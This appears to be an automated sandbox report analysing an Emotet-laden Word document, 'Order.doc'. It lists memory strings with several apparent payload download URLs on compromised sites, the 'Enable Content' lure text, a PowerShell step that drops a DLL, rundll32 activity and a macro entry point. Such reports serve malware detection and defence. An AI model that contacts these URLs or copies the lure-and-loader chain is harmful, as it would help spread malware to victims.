Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000005.00000002.2090481396.00000000024B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2098401477.0000000002A70000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095171986.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093779954.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095562122.00000000020E7000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp | String found in binary or memory: http://traumfrauen-ukraine.de/bin/JyeS/
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095171986.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093779954.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095562122.00000000020E7000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2090481396.00000000024B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2098401477.0000000002A70000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095171986.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093779954.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095562122.00000000020E7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://jflmktg.wpcomstaging.com/wp-content/AK/
                      Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
                      Source: powershell.exe, 00000005.00000002.2095244145.0000000003AC4000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                      Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: powershell.exe, 00000005.00000002.2095244145.0000000003AC4000.00000004.00000001.sdmpString found in binary or memory: https://shop.nowfal.dev
                      Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://shop.nowfal.dev/wp-includes/RlMObf2j0/
                      Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443

                      E-Banking Fraud:

                      Yara detected Emotet

                      System Summary:

                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                      Source: Screenshot number: 4 | Screenshot OCR: Enable Editing and Enable Content. 0 Page: I of I , words: 8,362 , ,3 , N@m 13 ;a 10096 G)
                      Source: Screenshot number: 4 | Screenshot OCR: Enable Content. 0 Page: I of I , words: 8,362 , ,3 , N@m 13 ;a 10096 G) FI G) ,, ' i " " Kk
                      Source: Document image extraction number: 0 | Screenshot OCR: Enable Editing and Enable Content.
                      Source: Document image extraction number: 0 | Screenshot OCR: Enable Content.
                      Source: Document image extraction number: 1 | Screenshot OCR: Enable Editing and Enable Content.
                      Source: Document image extraction number: 1 | Screenshot OCR: Enable Content.
                      Powershell drops PE file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll
                      Very long command line found
                      Source: unknown | Process created: Commandline size = 5413
                      Source: unknown | Process created: Commandline size = 5312
                      Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 5312
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\SysWOW64\Fceveflzqtqcb\
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00884F04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0087A525
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00879D2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00873336
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00877731
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0088CF31
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00877B39
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00873938
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0087C145
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00889B4A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0088434E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00883F4F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0088135B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0087C364
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0088B165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0088A966
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0087F369
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00873B74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00875B7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00877378
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00229C3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00230604
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00234012
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022C017
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00239665
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022E272
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00225478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00234478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023CC7F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00229846
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023BC4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022C851
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023CA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002292A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023C4A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00226CA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002228AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00222EAC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002270AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022B6B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002334BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002390BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00229A99
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002230E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002268EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002250F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002366FB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002300FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002314FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002334C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002338C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002308CF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00239EDA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022B8D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023A6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022E8DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00223523
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022A323
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00233D29
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022EF2E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022F52E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022FF2C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00239333
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00237132
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023D138
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023B706
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00224304
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022B10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00232515
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023891E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00225D63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023B165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00231372
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00222B70
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00220D7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00232179
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022177C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00224D48
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00222353
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022EB54
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023C15B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00236158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023C5A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00237FA7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00231BA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002341AB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00223DB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022D5B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00221983
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022DB86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022598B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022498C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022F793
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022F797
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00229D95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023819F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022FBE6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022B3E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002227F3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022D3F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_008A303C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_008B1E14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EC017
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F4012
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F0604
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E9C3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FCA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EC851
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FBC4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E9846
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FCC7F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E5478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F4478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EE272
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F9665
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E9A99
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F34BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F90BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EB6B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E2EAC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E70AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E28AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FC4A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E6CA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E92A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EE8DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F9EDA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EB8D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FA6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F08CF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F34C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F38C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F00FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F14FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F66FB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E50F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E68EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E30E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F891E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F2515
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EB10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FB706
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E4304
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FD138
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F9333
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F7132
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EEF2E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EF52E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EFF2C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F3D29
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E3523
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EA323
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FC15B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F6158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EEB54
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E2353
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E4D48
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E177C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E0D7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F2179
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F1372
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E2B70
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FB165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E5D63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F819F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EF797
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E9D95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EF793
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E498C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E598B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EDB86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E1983
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E3DB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001ED5B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F41AB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F7FA7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F1BA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FC5A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001ED3F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E27F3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EB3E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EFBE6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0043303C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00441E14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028A821
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00286417
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00284844
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00295250
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028CAA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029A0F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028D2DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00285F04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029434E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002947B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00290B8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00284D90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029CBE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00298C2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029D02D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00290223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00292631
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00298A33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00294C37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00282208
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028240F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00292C05
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00281806
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00285418
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028E612
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029AA7B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028327F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00290672
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028BE74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028E044
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028DE81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00294A9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00291090
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029D4E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028ECFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028D6F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028A6C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029C6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028A2D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00289D2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028A525
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00283938
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00287B39
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029CF31
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00287731
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00283336
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029D70B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00294F04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00289106
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028F369
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028C364
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029B165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029A966
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00287378
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00285B7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00283B74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00299B4A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00293F4F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028C145
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029135B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002993AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00283FAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028ADAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00292FA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002909B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028F9BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028FFBA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00299DBF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00297BBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00291F88
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00297187
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00293590
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029C192
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028BB96
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002867EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028F5E0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00296BE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002835FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00287FFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00291DFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029BBF1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029DBC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00282DDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002857D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00209C3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00210604
                      Source: Order.doc | OLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentation | OLE, VBA macro: Module Ynzysnuyyfihfq23d, Function Document_open
                      Source: Order.doc | OLE indicator, VBA macros: true
                      Source: J47K.dll.5.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
                      Source: classification engine | Classification label: mal100.troj.evad.winDOC@20/8@2/3
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$Order.doc
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRBF29.tmp
                      Source: Order.doc | OLE indicator, Word Document stream: true
                      Source: Order.doc | OLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exe | Console Write: (binary console buffer; decodable text: "Async message sent to session Console")
